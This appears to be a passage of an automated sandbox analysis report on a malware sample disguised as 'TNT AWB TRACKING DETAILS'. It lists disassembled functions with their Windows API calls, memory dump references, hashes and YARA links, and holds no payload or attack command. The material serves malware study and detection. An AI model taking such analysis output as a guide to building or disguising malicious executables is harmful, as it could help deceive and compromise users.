                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                      • String ID:
                                      • API String ID: 752480666-0
                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                      Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                      Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                      • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                      • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                      Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                      • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                      Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32 ref: 004555C7
                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                      • String ID:
                                      • API String ID: 3691411573-0
                                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                      Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                      • EndPath.GDI32(?), ref: 004472D6
                                      • StrokePath.GDI32(?), ref: 004472E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                      • String ID:
                                      • API String ID: 372113273-0
                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                      Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                      Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0041708E
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __amsg_exit.LIBCMT ref: 004170AE
                                      • __lock.LIBCMT ref: 004170BE
                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                      • _free.LIBCMT ref: 004170EE
                                      • InterlockedIncrement.KERNEL32(030D2CD8), ref: 00417106
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                      • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                      • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                      Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                      • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                      • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                      Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                      • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                      • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                      • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                      Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                      • String ID:
                                      • API String ID: 442100245-0
                                      • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                      • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                      • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                      Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                      • _wcslen.LIBCMT ref: 0045F94A
                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                      • String ID: 0
                                      • API String ID: 621800784-4108050209
                                      • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                      • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                      • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                      • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                      Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                      • String ID: \VH
                                      • API String ID: 3884216118-234962358
                                      • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                      • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                      • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                      Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                      • IsMenu.USER32(?), ref: 0044854D
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                      • DrawMenuBar.USER32 ref: 004485AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert
                                      • String ID: 0
                                      • API String ID: 3076010158-4108050209
